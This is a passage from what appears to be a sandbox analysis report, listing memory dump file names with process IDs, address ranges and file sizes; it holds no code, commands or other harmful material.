memory/4252-201-0x0000000000000000-mapping.dmp
-
memory/4268-190-0x0000000000000000-mapping.dmp
-
memory/4268-191-0x000000006EDD0000-0x000000006EDE0000-memory.dmpFilesize
64KB
-
memory/4360-199-0x0000000000000000-mapping.dmp
-
memory/4420-143-0x0000000000000000-mapping.dmp
-
memory/4476-239-0x0000000000000000-mapping.dmp
-
memory/4484-185-0x0000000000000000-mapping.dmp
-
memory/4484-172-0x0000000000000000-mapping.dmp
-
memory/4484-206-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmpFilesize
760KB
-
memory/4484-186-0x00007FFEB7B10000-0x00007FFEB7BCE000-memory.dmpFilesize
760KB
-
memory/4548-203-0x0000000000000000-mapping.dmp
-
memory/4548-193-0x0000000000000000-mapping.dmp
-
memory/4620-220-0x0000000000000000-mapping.dmp
-
memory/4648-156-0x0000000000000000-mapping.dmp
-
memory/4660-215-0x0000000000000000-mapping.dmp
-
memory/4712-181-0x0000000000000000-mapping.dmp
-
memory/4784-198-0x0000000000000000-mapping.dmp
-
memory/4792-207-0x0000000000000000-mapping.dmp
-
memory/4904-221-0x0000000000000000-mapping.dmp
-
memory/4908-216-0x0000000000000000-mapping.dmp
-
memory/4952-153-0x0000000000000000-mapping.dmp
-
memory/4984-139-0x0000000000000000-mapping.dmp
-
memory/5100-257-0x0000000003630000-0x0000000003698000-memory.dmpFilesize
416KB
-
memory/5100-242-0x0000000000000000-mapping.dmp
-
memory/5100-270-0x0000000003630000-0x0000000003698000-memory.dmpFilesize
416KB
-
memory/5500-271-0x0000000000400000-0x0000000000439000-memory.dmpFilesize
228KB
-
memory/5560-272-0x0000000000400000-0x0000000000432000-memory.dmpFilesize
200KB